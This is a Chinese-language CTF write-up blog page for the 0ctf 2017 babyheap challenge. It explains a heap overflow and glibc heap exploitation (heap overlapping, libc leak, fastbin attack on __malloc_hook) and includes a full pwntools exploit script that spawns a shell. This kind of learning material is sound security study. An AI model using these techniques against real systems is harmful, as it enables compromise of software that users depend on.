<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no">
<meta name="author" content="HeZhaochen">



<meta name="description" content="pwn真的是太有趣了，让人上头哈哈哈。这道题也是一道堆利用的基础题。记录一下自己的学习过程，也是总结一下这类题目的解题思路以及基本套路。">
<meta name="keywords" content="pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="0ctf-2017-babyheap">
<meta property="og:url" content="http://yoursite.com/2020/03/20/0ctf-2017-babyheap/index.html">
<meta property="og:site_name" content="good good study,day day up!">
<meta property="og:description" content="pwn真的是太有趣了，让人上头哈哈哈。这道题也是一道堆利用的基础题。记录一下自己的学习过程，也是总结一下这类题目的解题思路以及基本套路。">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://yoursite.com/img/0ctf-babyheap/1.jpg">
<meta property="og:updated_time" content="2020-03-20T14:14:45.372Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="0ctf-2017-babyheap">
<meta name="twitter:description" content="pwn真的是太有趣了，让人上头哈哈哈。这道题也是一道堆利用的基础题。记录一下自己的学习过程，也是总结一下这类题目的解题思路以及基本套路。">
<meta name="twitter:image" content="http://yoursite.com/img/0ctf-babyheap/1.jpg">

<link rel="apple-touch-icon" href="/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="good good study,day day up!" type="application/atom+xml">



    <link rel="shortcut icon" href="/favicon.png">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">


<link rel="stylesheet" href="/css/style.css">



<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>0ctf-2017-babyheap | good good study,day day up!</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: false
    }
</script>


    <script> yiliaConfig.jquery_ui = [false]; </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/avatar.png" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">HeZhaochen</a></h1>
        </hgroup>

        

        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="mailto:123@123.com" title="Email"></a>
                            
                                <a class="fa GitHub" href="#" title="GitHub"></a>
                            
                                <a class="fa RSS" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/heap/">heap</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/how2heap/">how2heap</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pwn/">pwn</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/密码学/">密码学</a></li></ul>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" href="https://hexo.io">Hexo</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://pages.github.com/">GitHub</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://moxfive.xyz/">MOxFIVE</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">专注于前端</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">HeZhaochen</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/avatar.png" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">HeZhaochen</a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="mailto:123@123.com" title="Email"></a>
                            
                                <a class="fa GitHub" target="_blank" href="#" title="GitHub"></a>
                            
                                <a class="fa RSS" target="_blank" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="标签" friends="友情链接" about="关于我"/>
</nav>
      <div class="body-wrap"><article id="post-0ctf-2017-babyheap" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2020/03/20/0ctf-2017-babyheap/" class="article-date">
      <time datetime="2020-03-20T12:50:58.000Z" itemprop="datePublished">2020-03-20</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      0ctf-2017-babyheap
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pwn/">pwn</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p>pwn真的是太有趣了，让人上头哈哈哈。这道题也是一道堆利用的基础题。记录一下自己的学习过程，也是总结一下这类题目的解题思路以及基本<br>套路。</p>
<a id="more"></a>

<h2 id="程序分析"><a href="#程序分析" class="headerlink" title="程序分析"></a>程序分析</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">[*] &apos;/home/aidmong/Desktop/ctf/pwn/buuctf/babyheap/babyheap&apos;</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Full RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      PIE enabled</span><br></pre></td></tr></table></figure>

<p>分析发现程序的保护全开，实在是让人头痛。这样的话我们肯定是要泄露地址，同时由于不能修改got表，那我们可能还要修改malloc_hook</p>
<p>ida反汇编后发现是一道比较常见的菜单题<br>创建没什么好说的，就是输入我们需要的chunk大小，利用calloc函数来创建，最后把chunk是否使用，chunk的大小和堆地址存储在一个全局<br>变量中。这里唯一需要注意的就是由于本题使用的是calloc函数，因此在申请地址的时候会把原地址的内容给清除，这会给我们的利用带来一定<br>的麻烦。<br><img src="/img/0ctf-babyheap/1.jpg" alt="avatar"><br>编辑函数就是我们本题的漏洞所在了，由于并没有对编辑的size进行检查，因此这里就有了一个堆溢出的漏洞<br>至于delete和show也没啥好多说的，就是不断构造chunk来泄露地址以及拿到需要的shell</p>
<h2 id="具体利用"><a href="#具体利用" class="headerlink" title="具体利用"></a>具体利用</h2><p>我们首先利用堆溢出伪造一个size覆盖了下一个chunk的chunk</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">create(0x20)</span><br><span class="line">create(0x20)</span><br><span class="line">create(0x100)</span><br><span class="line">create(0x20)</span><br><span class="line">payload = &apos;a&apos;*0x20+p64(0)+p64(0x141)</span><br><span class="line">edit(0,len(payload),payload)</span><br></pre></td></tr></table></figure>

<p>这时我们的堆结构已经被我们修改</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">x/40gx 0x562182141000</span><br><span class="line">0x562182141000:	0x0000000000000000	0x0000000000000031  ==&gt;chunk0</span><br><span class="line">0x562182141010:	0x6161616161616161	0x6161616161616161</span><br><span class="line">0x562182141020:	0x6161616161616161	0x6161616161616161</span><br><span class="line">0x562182141030:	0x0000000000000000	0x0000000000000141  ==&gt;chunk1</span><br><span class="line">0x562182141040:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x562182141050:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x562182141060:	0x0000000000000000	0x0000000000000111  ==&gt;chunk2</span><br><span class="line">0x562182141070:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x562182141080:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x562182141090:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x5621821410a0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x5621821410b0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x5621821410c0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x5621821410d0:	0x0000000000000000	0x0000000000000000</span><br></pre></td></tr></table></figure>

<p>接下来我们先删除chunk1，由于chunk1的大小属于unsorted bin的范围，所以chunk1会被加入双向链表。这样其实我们保存<br>chunk地址的全局变量ptr中的chunk1信息已经被清空了。然后我们再次创建一个大小为0x130的chunk，并且再次伪造出原先的chunk2。这<br>样当我们show(1)时，我们就能够直接泄露到chunk2了。然后我们只需要释放chunk2，chunk2也会被加入链表，同时根据libc的机制，chunk2<br>的fd 和bk都会存储libc_main_arena的地址。之后我们就能利用show(1)来连带着泄露出libc地址。这就是做题时常常会使用到的heap<br>overlapping了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">delete(1)</span><br><span class="line">create(0x130)</span><br><span class="line">payload = &apos;\x00&apos;*0x20+p64(0)+p64(0x111)</span><br><span class="line">edit(1,len(payload),payload)</span><br><span class="line">delete(2)</span><br><span class="line">show(1)</span><br><span class="line">p.recv(0x3a)</span><br><span class="line">libc_main_arena = u64(p.recv(6).ljust(8,&apos;\x00&apos;))-88</span><br><span class="line">#obj = LibcSearcher(&apos;main_arena&apos;,libc_main_arena)</span><br><span class="line">libc_base = libc_main_arena - offset</span><br><span class="line">shell = libc_base + 0x4526a</span><br></pre></td></tr></table></figure>

<p>接下里我们需要做的就是劫持malloc_hook了，我们都知道malloc_hook的地址是在libc_main_arena的上方。这里我们选择劫持比较常见<br>的main_arena-0x33这个地址，因为这里可以被作为一个合理的fakechunk，只要申请到这个地址，我们就能够对malloc_hook进行修改。<br>同样的我们就能够想到由于libc在申请chunk的时候首先会检查bin里面有没有合适大小的chunk，我们可以尝试修改fastbin这个链表，来申请<br>出我们所需要的chunk。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">create(0x60)</span><br><span class="line">delete(2)</span><br><span class="line">payload = &apos;a&apos;*0x20+p64(0)+p64(0x71)+p64(fake_addr)</span><br><span class="line">edit(1,len(payload),payload)</span><br></pre></td></tr></table></figure>

<p>在这样的修改之后，我们再去查看堆布局就会发现chunk2的fd就会变我们伪造的chunk地址，同时fastbin中也被加入了这个地址</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; fastbin</span><br><span class="line">fastbins</span><br><span class="line">0x20: 0x0</span><br><span class="line">0x30: 0x0</span><br><span class="line">0x40: 0x0</span><br><span class="line">0x50: 0x0</span><br><span class="line">0x60: 0x0</span><br><span class="line">0x70: 0x556579e09060 —▸ 0x7f557744daed (_IO_wide_data_0+301) ◂— 0x557710ee20000000</span><br><span class="line">0x80: 0x0</span><br></pre></td></tr></table></figure>

<p>那么当我们申请两次之后，申请到的就是fake_addr，然后在里面填充one_gadgets就能拿到shell了</p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">from LibcSearcher import LibcSearcher</span><br><span class="line">context.log_level = &apos;debug&apos;</span><br><span class="line">p = process(&apos;./babyheap&apos;)</span><br><span class="line">#p = remote(&apos;node3.buuoj.cn&apos;,26569)</span><br><span class="line">offset = 0x3c4b20</span><br><span class="line"></span><br><span class="line">def create(size):</span><br><span class="line">	p.sendlineafter(&apos;: &apos;,&apos;1&apos;)</span><br><span class="line">	p.recvuntil(&apos;Size: &apos;)</span><br><span class="line">	p.sendline(str(size))</span><br><span class="line"></span><br><span class="line">def edit(idx,size,content):</span><br><span class="line">	p.sendlineafter(&apos;: &apos;,&apos;2&apos;)</span><br><span class="line">	p.recvuntil(&apos;Index: &apos;)</span><br><span class="line">	p.sendline(str(idx))</span><br><span class="line">	p.recvuntil(&apos;Size: &apos;)</span><br><span class="line">	p.sendline(str(size))</span><br><span class="line">	p.recvuntil(&apos;Content: &apos;)</span><br><span class="line">	p.send(content)</span><br><span class="line">	</span><br><span class="line">def delete(idx):</span><br><span class="line">	p.sendlineafter(&apos;: &apos;,&apos;3&apos;)</span><br><span class="line">	p.recvuntil(&apos;Index: &apos;)	</span><br><span class="line">	p.sendline(str(idx))</span><br><span class="line"></span><br><span class="line">def show(idx):</span><br><span class="line">	p.sendlineafter(&apos;: &apos;,&apos;4&apos;)</span><br><span class="line">	p.recvuntil(&apos;Index: &apos;)</span><br><span class="line">	p.sendline(str(idx))</span><br><span class="line"></span><br><span class="line">create(0x20)</span><br><span class="line">create(0x20)</span><br><span class="line">create(0x100)</span><br><span class="line">create(0x20)</span><br><span class="line">payload = &apos;a&apos;*0x20+p64(0)+p64(0x141)</span><br><span class="line">edit(0,len(payload),payload)</span><br><span class="line">delete(1)</span><br><span class="line">create(0x130)</span><br><span class="line">payload = &apos;\x00&apos;*0x20+p64(0)+p64(0x111)</span><br><span class="line">edit(1,len(payload),payload)</span><br><span class="line">delete(2)</span><br><span class="line">show(1)</span><br><span class="line">p.recv(0x3a)</span><br><span class="line">libc_main_arena = u64(p.recv(6).ljust(8,&apos;\x00&apos;))-88</span><br><span class="line">#obj = LibcSearcher(&apos;main_arena&apos;,libc_main_arena)</span><br><span class="line">libc_base = libc_main_arena - offset</span><br><span class="line">shell = libc_base + 0x4526a</span><br><span class="line"></span><br><span class="line">#print hex(libc_base)</span><br><span class="line">create(0x60)</span><br><span class="line">delete(2)</span><br><span class="line">fake_addr = libc_main_arena-0x33</span><br><span class="line">payload = &apos;a&apos;*0x20+p64(0)+p64(0x71)+p64(fake_addr)</span><br><span class="line">print payload</span><br><span class="line">edit(1,len(payload),payload)</span><br><span class="line">create(0x60)</span><br><span class="line">create(0x60)</span><br><span class="line">payload = &apos;a&apos;*0x13+p64(shell)</span><br><span class="line">edit(4,len(payload),payload)</span><br><span class="line">create(0x10)</span><br><span class="line">#gdb.attach(p)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>这种题目现在基本只能算作比赛的签到题了，本菜鸡还是不能完整的解出来。心态都要爆炸了。不说了，撸源码去了呜呜呜</p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2020/03/20/0ctf-2017-babyheap/">0ctf-2017-babyheap</a></p>
        <p><span>文章作者:</span><a href="/" title="回到主页">HeZhaochen</a></p>
        <p><span>发布时间:</span>2020-03-20, 20:50:58</p>
        <p><span>最后更新:</span>2020-03-20, 22:14:45</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2020/03/20/0ctf-2017-babyheap/" title="0ctf-2017-babyheap">http://yoursite.com/2020/03/20/0ctf-2017-babyheap/</a>
            <span class="copy-path" data-clipboard-text="原文: http://yoursite.com/2020/03/20/0ctf-2017-babyheap/　　作者: HeZhaochen" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2020/05/29/攻防世界-echo-back-IO-FILE结构体初探/">
                    攻防世界-echo_back-IO_FILE结构体初探
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2020/03/15/高校抗疫-easyheap/">
                    高校抗疫-easyheap
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">文章目录</strong>
        
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#程序分析"><span class="toc-number">1.</span> <span class="toc-text">程序分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#具体利用"><span class="toc-number">2.</span> <span class="toc-text">具体利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#exp"><span class="toc-number">3.</span> <span class="toc-text">exp</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#小结"><span class="toc-number">4.</span> <span class="toc-text">小结</span></a></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-3 i,
        .toc-level-3 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

    <script>
        yiliaConfig.toc = ["隐藏目录", "显示目录", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></i></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"0ctf-2017-babyheap　| good good study,day day up!　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>







    




    <div class="scroll" id="post-nav-button">
        
            <a href="/2020/05/29/攻防世界-echo-back-IO-FILE结构体初探/" title="上一篇: 攻防世界-echo_back-IO_FILE结构体初探">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2020/03/15/高校抗疫-easyheap/" title="下一篇: 高校抗疫-easyheap">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2020/08/17/ciscn-2019-final-3——初探Tcache/">ciscn-2019-final_3——初探Tcache</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/05/29/攻防世界-echo-back-IO-FILE结构体初探/">攻防世界-echo_back-IO_FILE结构体初探</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/20/0ctf-2017-babyheap/">0ctf-2017-babyheap</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/15/高校抗疫-easyheap/">高校抗疫-easyheap</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/02/26/攻防世界-Noleak/">攻防世界-Noleak</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/02/22/攻防世界-Recho-读取flag文件/">攻防世界-Recho-读取flag文件</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/02/17/ReeHY-mian-100-Unlink/">ReeHY-mian-100-Unlink</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/02/08/栈溢出的总结/">栈溢出的总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/02/05/2014-HITCON-CTF-stkof/">2014 HITCON CTF-stkof</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/01/23/攻防世界PWN之note-service2/">攻防世界PWN之note-service2</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/12/02/how2heap学习笔记-1-——fastbin-dup/">hoe2heap学习笔记(1)——fastbin_dup</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/11/20/XCTF-format2-整数溢出/">XCTF-format2-整数溢出</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/11/18/mma-ctf-2nd-2016-greeting-150/">mma-ctf-2nd-2016-greeting-150</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/22/MCTF校赛WP-2/">MCTF校赛WP(2)</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/17/MCTF初赛WP-1/">MCTF初赛WP(1)</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/10/初次学习RSA密码/">初次学习RSA密码</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/31/use-after-free的学习/">use after free的学习</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/27/使用LibcSearcher解题/">使用LibcSearcher解题</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/21/heap-1/">heap-1</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2019-2020 HeZhaochen
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank" title="快速、简洁且高效的博客框架">Hexo</a>  Theme <a href="https://github.com/MOxFIVE/hexo-theme-yelee" target="_blank" title="简而不减 Hexo 双栏博客主题  v3.5">Yelee</a> by MOxFIVE <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" title="本站到访数"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit"  title="本页阅读量"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 2;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="返回顶部"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="查看评论"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="转到底部"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div>
</body>
</html>